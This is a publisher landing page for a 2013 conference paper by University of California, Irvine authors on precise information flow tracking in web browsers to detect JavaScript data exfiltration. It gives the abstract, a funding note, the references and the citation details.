Skip to main content
SpringerLink
Log in

Towards Precise and Efficient Information Flow Control in Web Browsers

  • Conference paper
Trust and Trustworthy Computing (Trust 2013)

Part of the book series: Lecture Notes in Computer Science ((LNSC,volume 7904))

Included in the following conference series:

Abstract

JavaScript (JS) has become the dominant programming language of the Internet and powers virtually every web page. If an adversary manages to inject malicious JS into a web page, confidential user data such as credit card information and keystrokes may be exfiltrated without the users knowledge.

We present a comprehensive approach to information flow security that allows precise labeling of scripting-exposed browser subsystems: the JSĀ engine, the Document Object Model, and user generated events. Our experiments show that our framework is precise and efficient, and detects information exfiltration attempts by monitoring network requests.

This material is based upon work partially supported by the Defense Advanced Research Projects Agency (DARPA) under contract No.Ā D11PC20024, by the National Science Foundation (NSF) under grant No.Ā CCF-1117162, and by a gift from Google. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the Defense Advanced Research Projects Agency (DARPA) or its Contracting Agent, the U.S. Department of the Interior, National Business Center, Acquisition Services Directorate, Sierra Vista Branch, the National Science Foundation, or any other agency of the U.S.Ā Government.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution
Chapter
USD 29.95
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
USD 39.99
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
USD 49.99
Price excludes VAT (USA)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Preview

Unable to display preview. Download preview PDF.

Unable to display preview. Download preview PDF.

References

  1. OWASP: The open web application security project, https://www.owasp.org/

  2. Microsoft: Microsoft security intelligence report, vol. 13 (2012), http://www.microsoft.com/security/sir/default.aspx

  3. Jang, D., Jhala, R., Lerner, S., Shacham, H.: An empirical study of privacy-violating information flows in JavaScript web applications. In: Proceedings of the Conference on Computer and Communications Security, pp. 270ā€“283. ACM (2010)

    Google ScholarĀ 

  4. Vogt, P., Nentwich, F., Jovanovic, N., Kruegel, C., Kirda, E., Vigna, G.: Cross site scripting prevention with dynamic data tainting and static analysis. In: Proceedings of Annual Network and Distributed System Security Symposium (2007)

    Google ScholarĀ 

  5. Just, S., Cleary, A., Shirley, B., Hammer, C.: Information flow analysis for JavaScript. In: Proceedings of the ACM International Workshop on Programming Language and Systems Technologies for Internet Clients, pp. 9ā€“18. ACM (2011)

    Google ScholarĀ 

  6. Russo, A., Sabelfeld, A., Chudnov, A.: Tracking information flow in dynamic tree structures. In: Backes, M., Ning, P. (eds.) ESORICS 2009. LNCS, vol.Ā 5789, pp. 86ā€“103. Springer, Heidelberg (2009)

    ChapterĀ  Google ScholarĀ 

  7. Groef, W.D., Devriese, D., Nikiforakis, N., Piessens, F.: FlowFox: a web browser with flexible and precise information flow control. In: Proceedings of the ACM Conference on Computer and Communications Security. ACM (2012)

    Google ScholarĀ 

  8. Goguen, J., Meseguer, J.: Security policies and security models. In: Proceedings of IEEE Symposium on Security and Privacy. IEEE (1982)

    Google ScholarĀ 

  9. Myers, A.C., Liskov, B.: Protecting privacy using the decentralized label model. ACM Transactions on Software Engineering and MethodologyĀ 9, 410ā€“442 (2000)

    ArticleĀ  Google ScholarĀ 

  10. Myers, A.C., Zheng, L., Zdancewic, S., Chong, S., Nystrom, N.: Jif: Java information flow (2001), http://www.cs.cornell.edu/jif

  11. Hennigan, E., Kerschbaumer, C., Brunthaler, S., Franz, M.: Tracking information flow for dynamically typed programming languages by instruction set extension. Technical report, University of California Irvine (2011)

    Google ScholarĀ 

  12. Nikiforakis, N., Invernizzi, L., Kapravelos, A., Van Acker, S., Joosen, W., Kruegel, C., Piessens, F., Vigna, G.: You are what you include: Large-scale evaluation of remote javascript inclusions. In: Proceedings of the Conference on Computer and Communications Security. ACM (2012)

    Google ScholarĀ 

  13. Hedin, D., Sabelfeld, A.: Information-flow security for a core of JavaScript. In: Proceedings of the Computer Security Foundations Symposium, pp. 3ā€“18 (2012)

    Google ScholarĀ 

Download references

Author information

Authors and Affiliations

  1. University of California, Irvine, USA

    Christoph Kerschbaumer,Ā Eric Hennigan,Ā Per Larsen,Ā Stefan BrunthalerĀ &Ā Michael Franz

Authors
  1. Christoph Kerschbaumer
    View author publications

    You can also search for this author in PubMedĀ Google Scholar

  2. Eric Hennigan
    View author publications

    You can also search for this author in PubMedĀ Google Scholar

  3. Per Larsen
    View author publications

    You can also search for this author in PubMedĀ Google Scholar

  4. Stefan Brunthaler
    View author publications

    You can also search for this author in PubMedĀ Google Scholar

  5. Michael Franz
    View author publications

    You can also search for this author in PubMedĀ Google Scholar

Editor information

Editors and Affiliations

  1. Department of Computing, Imperial College London, SW7 2AZ, London, United Kingdom

    Michael Huth

  2. Nokia Research Center, Helsinki, Finland

    N. Asokan

  3. Department of Computer Science, ETH Zurich, Switzerland

    Srdjan Čapkun

  4. University of Oxford, UK

    Ivan Flechais

  5. Information Security Group, Royal Holloway University of London, TW20 0EX, Egham, Surrey, UK

    Lizzie Coles-Kemp

Rights and permissions

Reprints and permissions

Copyright information

Ā© 2013 Springer-Verlag Berlin Heidelberg

About this paper

Cite this paper

Kerschbaumer, C., Hennigan, E., Larsen, P., Brunthaler, S., Franz, M. (2013). Towards Precise and Efficient Information Flow Control in Web Browsers. In: Huth, M., Asokan, N., Čapkun, S., Flechais, I., Coles-Kemp, L. (eds) Trust and Trustworthy Computing. Trust 2013. Lecture Notes in Computer Science, vol 7904. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-38908-5_14

Download citation

  • DOI: https://doi.org/10.1007/978-3-642-38908-5_14

  • Publisher Name: Springer, Berlin, Heidelberg

  • Print ISBN: 978-3-642-38907-8

  • Online ISBN: 978-3-642-38908-5

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation